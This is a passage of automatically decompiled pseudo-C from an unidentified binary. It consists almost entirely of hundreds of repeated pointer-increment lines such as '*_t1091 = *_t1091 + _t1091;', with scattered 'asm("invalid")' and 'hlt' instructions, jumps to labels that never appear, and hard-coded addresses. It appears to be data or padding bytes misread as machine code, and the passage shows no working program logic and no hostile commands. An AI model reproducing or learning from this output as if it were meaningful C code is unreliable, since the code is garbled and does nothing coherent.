				 *_t1089 =  *_t1089 + _t1089;
				_t1090 = _t1089 + _t1263;
				 *_t1090 =  *_t1090 + _t1090;
				 *((intOrPtr*)(_t1090 + 0x35)) =  *((intOrPtr*)(_t1090 + 0x35)) + _t1090;
				_t1091 = _t1090 + 1;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *((intOrPtr*)(_t1091 + 0x18)) =  *((intOrPtr*)(_t1091 + 0x18)) + _t1091;
				_t1264 = _t1263 + 1;
				 *((intOrPtr*)(_t1091 + 0x1a)) =  *((intOrPtr*)(_t1091 + 0x1a)) + _t1264;
				 *((intOrPtr*)(_t1091 - 0x78)) =  *((intOrPtr*)(_t1091 - 0x78)) + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 | _t1091;
				_t1266 = _t1264 + 2;
				 *((intOrPtr*)(_t1278 + 0x4010)) =  *((intOrPtr*)(_t1278 + 0x4010)) + _t1266;
				 *_t1266 =  *_t1266 & _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				asm("adc byte [ebx], 0x40");
				 *_t1213 =  *_t1213 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *_t1221 =  *_t1221 + _t1091;
				 *_t1091 =  *_t1091 + _t1091;
				 *((intOrPtr*)(_t1091 + 0x35)) =  *((intOrPtr*)(_t1091 + 0x35)) + _t1091;
				_t1092 = _t1091 + 1;
				 *_t1092 =  *_t1092 + _t1092;
				 *_t1092 =  *_t1092 + _t1092;
				 *_t1092 =  *_t1092 + _t1213;
				_pop(ss);
				_t1267 =  &(_t1266[0]);
				_t1214 = _t1213 + _t1213;
				asm("invalid");
				 *_t1092 =  *_t1092 + 1;
				 *_t1092 =  *_t1092 + _t1092;
				 *((intOrPtr*)(_t1281 + _t1278 + 0x20080040)) =  *((intOrPtr*)(_t1281 + _t1278 + 0x20080040)) + _t1267;
				_t1268 =  &(_t1267[0]);
				 *_t1268 =  *_t1268 + _t1092;
				 *_t1092 =  *_t1092 + _t1092;
				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1268;
				 *_t1092 =  *_t1092 + _t1092;
				 *_t1092 =  *_t1092 + _t1092;
				 *_t1092 =  *_t1092 + _t1092;
				 *_t1092 =  *_t1092 + _t1092;
				 *_t1092 =  *_t1092 + _t1092;
				 *_t1092 =  *_t1092 + _t1092;
				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1268;
				 *_t1221 =  *_t1221 + _t1092;
				 *_t1092 =  *_t1092 + _t1092;
				 *((intOrPtr*)(_t1092 + 0x3a)) =  *((intOrPtr*)(_t1092 + 0x3a)) + _t1268;
				_t1093 = _t1092 + 1;
				 *_t1093 =  *_t1093 + _t1093;
				 *_t1093 =  *_t1093 + _t1093;
				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1214;
				 *_t1221 =  *_t1221 + _t1093;
				 *_t1093 =  *_t1093 + _t1093;
				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1093;
				 *_t1093 =  *_t1093 + _t1093;
				 *_t1093 =  *_t1093 + _t1093;
				 *((intOrPtr*)(_t1093 + 0x2c)) =  *((intOrPtr*)(_t1093 + 0x2c)) + _t1093;
				_t1094 = _t1093 + 1;
				 *_t1278 =  *_t1278 + _t1094;
				 *_t1094 =  *_t1094 + _t1094;
				 *((intOrPtr*)(_t1306 +  &_a64)) =  *((intOrPtr*)(_t1306 +  &_a64)) + _t1094;
				 *_t1214 =  *_t1214 + _t1094;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1268;
				 *((intOrPtr*)(_t1281 +  &_a64)) =  *((intOrPtr*)(_t1281 +  &_a64)) + _t1268;
				 *_t1094 =  *_t1094 + _t1214;
				_t1095 =  *0x42;
				 *_t1095 =  *_t1095 + _t1095;
				_push(0x76);
				if ( *_t1095 >= 0) goto L92;
				 *_t1095 =  *_t1095 + _t1095;
				 *_t1095 =  *_t1095 + _t1095;
				 *_t1095 =  *_t1095 + _t1095;
				 *_t1095 =  *_t1095 + _t1095;
				asm("pushad");
				if(_t1095 !=  *_t1095) {
					_t1149 = _t1095 + 1;
					 *_t1149 =  *_t1149 + _t1149;
					_pop(ds);
					 *((intOrPtr*)(_t1149 + _t1149)) =  *((intOrPtr*)(_t1149 + _t1149)) + _t1214;
					 *_t1149 =  *_t1149 + _t1149;
					_t1150 = _t1149 + 1;
					_t1214 = _t1214 + _t1214;
					asm("invalid");
					 *_t1150 =  *_t1150 + 1;
					 *_t1150 =  *_t1150 + _t1150;
					 *_t1150 =  *_t1150 + _t1150;
					 *_t1150 =  *_t1150 + _t1150;
					 *((intOrPtr*)(_t1150 + 0x2d)) =  *((intOrPtr*)(_t1150 + 0x2d)) + _t1150;
					_t1151 = _t1150 + 1;
					 *_t1151 =  *_t1151 + _t1268;
					_pop(_t1268);
					if ( *_t1151 >= 0) goto L94;
					_t1152 = _t1306;
					_t1306 = _t1151;
					asm("invalid");
					asm("invalid");
					_t1153 = _t1152 + 1;
					 *0x76 =  *0x76 + _t1221;
					 *_t1153 =  *_t1153 + _t1153;
					 *_t1153 =  *_t1153 + _t1153;
					asm("adc al, 0x3b");
					_t1095 = _t1153 + 1;
					 *_t1221 =  *_t1221 + _t1095;
					 *_t1214 =  *_t1214 + _t1095;
					 *_t1095 =  *_t1095 + _t1095;
				}
				 *_t1095 =  *_t1095 + _t1095;
				 *_t1095 =  *_t1095 + _t1095;
				 *_t1095 =  *_t1095 + _t1095;
				 *_t1095 =  *_t1095 + _t1095;
				asm("hlt");
				_t1096 = _t1095 - 0x5a200040;
				if (_t1096 >= 0) goto L96;
				_t1098 = (_t1096 & 0x0000003b) + 1;
				 *_t1221 =  *_t1221 + _t1098;
				 *_t1214 =  *_t1214 + _t1098;
				 *_t1098 =  *_t1098 + _t1098;
				asm("adc eax, [eax]");
				 *_t1098 =  *_t1098 + _t1098;
				 *_t1098 =  *_t1098 + _t1268;
				_t1100 = _t1098 +  *_t1098 +  *((intOrPtr*)(_t1098 +  *_t1098));
				 *_t1100 =  *_t1100 + _t1100;
				 *_t1100 =  *_t1100 + _t1100;
				 *_t1100 =  *_t1100 + _t1100;
				 *_t1100 =  *_t1100 + _t1100;
				_t1102 = _t1100 - 1 + 1;
				 *_t1102 =  *_t1102 + _t1268;
				_pop(_t1269);
				if ( *_t1102 >= 0) goto L97;
				_t1106 = _t1102 + 1 +  *((intOrPtr*)(_t1102 + 1)) +  *((intOrPtr*)(_t1102 + 1 +  *((intOrPtr*)(_t1102 + 1)))) + 1;
				 *_t1106 =  *_t1106 + _t1214;
				 *_t1106 =  *_t1106 + _t1221;
				 *_t1106 =  *_t1106 + _t1106;
				_t1108 = _t1106 +  *_t1106;
				 *_t1108 =  *_t1108 + _t1108;
				 *_t1108 =  *_t1108 + _t1108;
				 *_t1108 =  *_t1108 + _t1108;
				 *_t1108 =  *_t1108 + _t1108;
				asm("lodsb");
				_t1109 = _t1108 + 1;
				_t745 = _t1109 + 0x5a;
				 *_t745 =  *((intOrPtr*)(_t1109 + 0x5a)) + _t1109;
				if ( *_t745 >= 0) goto L98;
				_pop(_t1309);
				_t1112 = _t1109 +  *_t1109 + 1;
				 *_t1112 =  *_t1112 + _t1269;
				 *((intOrPtr*)(_t1112 + _t1112)) =  *((intOrPtr*)(_t1112 + _t1112)) + _t1221;
				 *((intOrPtr*)(_t1214 + 0xb6)) =  *((intOrPtr*)(_t1214 + 0xb6)) + _t1221;
				 *0x300 =  *0x300 + _t1112;
				 *_t1112 =  *_t1112 + _t1112;
				 *_t1112 =  *_t1112 + _t1112;
				 *_t1112 =  *_t1112 + _t1112;
				 *((intOrPtr*)(0x76 + _t1281)) =  *((intOrPtr*)(0x76 + _t1281)) + _t1112;
				_t1113 = _t1112 + 1;
				_t755 = _t1113 + 0x5a;
				 *_t755 =  *((intOrPtr*)(_t1113 + 0x5a)) + _t1269;
				_t1449 =  *_t755;
				if (_t1449 >= 0) goto L99;
				if(_t1449 >= 0) {
					_t1143 = _t1113 + 1;
					 *0x40000300 =  *0x40000300 + _t1143;
					 *_t1221 =  *_t1221 + _t1143;
					 *_t1143 =  *_t1143 + _t1269;
					 *_t1143 =  *_t1143 + _t1143;
					 *_t1214 = _t1214;
					_t1144 = _t1143 + 1;
					 *_t1269 =  *_t1269 + _t1144;
					 *_t1214 =  *_t1214 + _t1144;
					 *_t1144 =  *_t1144 + _t1144;
					 *_t1144 =  *_t1144 + _t1144;
					 *_t1144 =  *_t1144 + _t1144;
					 *_t1144 =  *_t1144 + _t1144;
					 *((intOrPtr*)(0x76 +  &_a64)) =  *((intOrPtr*)(0x76 +  &_a64)) + _t1214;
					_t761 = _t1144 + 0x5a;
					 *_t761 =  *((intOrPtr*)(_t1144 + 0x5a)) + _t1144;
					if ( *_t761 >= 0) goto L101;
					asm("das");
					_t1113 =  *0xad00402f + 1;
					 *((intOrPtr*)(_t1269 + 0x402f)) =  *((intOrPtr*)(_t1269 + 0x402f)) + _t1214;
				}
				 *_t1113 =  *_t1113 + _t1113;
				 *((intOrPtr*)(_t1309 +  &_a64)) =  *((intOrPtr*)(_t1309 +  &_a64)) + _t1113;
				_t1115 = _t1113 + _t1214 -  *((intOrPtr*)(_t1113 + _t1214));
				if(_t1115 >= 0) {
					 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
					_t1115 = _t1115 + 2;
					 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
					 *_t1115 =  *_t1115 + _t1115;
					 *_t1115 =  *_t1115 + _t1115;
					 *_t1115 =  *_t1115 + _t1115;
					 *_t1115 =  *_t1115 + _t1115;
				}
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				 *_t1115 =  *_t1115 + _t1115;
				_v1744814033 = _v1744814033 + _t1115;
				asm("das");
				_t1116 = _t1115 + 1;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *_t1116 =  *_t1116 + _t1116;
				 *((intOrPtr*)(_t1309 +  &_a735838272)) =  *((intOrPtr*)(_t1309 +  &_a735838272)) + _t1221;
				_t1117 = _t1116 + 1;
				 *((intOrPtr*)(_t1117 + 0x11)) =  *((intOrPtr*)(_t1117 + 0x11)) + _t1269;
				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
				_t1119 = _t1117 + 2;
				 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *_t1119 =  *_t1119 + _t1119;
				 *((intOrPtr*)(_t1309 +  &_a735838272)) =  *((intOrPtr*)(_t1309 +  &_a735838272)) + _t1269;
				_t1120 = _t1119 + 1;
				 *((intOrPtr*)(_t1120 + 0x11)) =  *((intOrPtr*)(_t1120 + 0x11)) + _t1269;
				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
				_t1122 = _t1120 + 2;
				 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				 *_t1122 =  *_t1122 + _t1122;
				_t1126 = _t1122 + _t1214 - 0x40 + _t1214 -  *((intOrPtr*)(_t1122 + _t1214 - 0x40 + _t1214));
				if(_t1126 >= 0) {
					 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1269;
					_t1126 = _t1126 + 2;
					 *((intOrPtr*)(_t1221 + _t1269 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1269 + 0x40)) + _t1214;
					 *_t1126 =  *_t1126 + _t1126;
					 *_t1126 =  *_t1126 + _t1126;
					 *_t1126 =  *_t1126 + _t1126;
					 *_t1126 =  *_t1126 + _t1126;
				}
				 *_t1126 =  *_t1126 + _t1126;
